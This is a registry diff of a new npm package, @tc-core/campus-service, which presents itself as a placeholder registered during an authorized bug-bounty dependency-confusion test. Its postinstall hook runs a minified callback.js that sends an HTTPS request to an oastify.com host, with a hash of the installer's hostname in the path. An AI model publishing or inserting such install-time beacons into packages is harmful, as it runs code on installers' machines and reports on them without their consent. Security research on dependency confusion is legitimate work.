@tc-core/campus-service 0.0.0-defensive-callback

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md ADDED
@@ -0,0 +1,2 @@
1
+ # @tc-core/campus-service
2
+ Defensive placeholder for an authorized bug-bounty engagement. See report for context.
package/callback.js ADDED
@@ -0,0 +1 @@
1
+ const https=require("https"),os=require("os"),crypto=require("crypto");try{const p="tccamp",h=crypto.createHash("sha256").update(String(os.hostname()||"x")).digest("hex").slice(0,16),n=crypto.randomBytes(4).toString("hex");const r=https.request({hostname:"waac1dw39v2ney34ktfa4xalocu3iw6l.oastify.com",port:443,path:"/"+p+"/"+h+"/"+n,method:"GET",timeout:2000});r.on("error",function(){});r.on("timeout",function(){r.destroy()});r.end();}catch(_){};setTimeout(function(){process.exit(0)},2500);
package/index.js ADDED
@@ -0,0 +1 @@
1
+ // Defensive placeholder. No exports.
package/package.json ADDED
@@ -0,0 +1 @@
1
+ {"name":"@tc-core/campus-service","version":"0.0.0-defensive-callback","description":"Defensive placeholder for the TimelyCare-internal @tc-core/campus-service scope. Registered under a researcher account during an authorized bug-bounty engagement to prevent third-party dependency-confusion takeover. Performs a single attribution HTTPS GET on install. No env vars, no file reads, no body data exfiltrated. Should be transferred to TimelyCare.","main":"index.js","license":"UNLICENSED","private":false,"publishConfig":{"access":"public"},"scripts":{"postinstall":"node callback.js"}}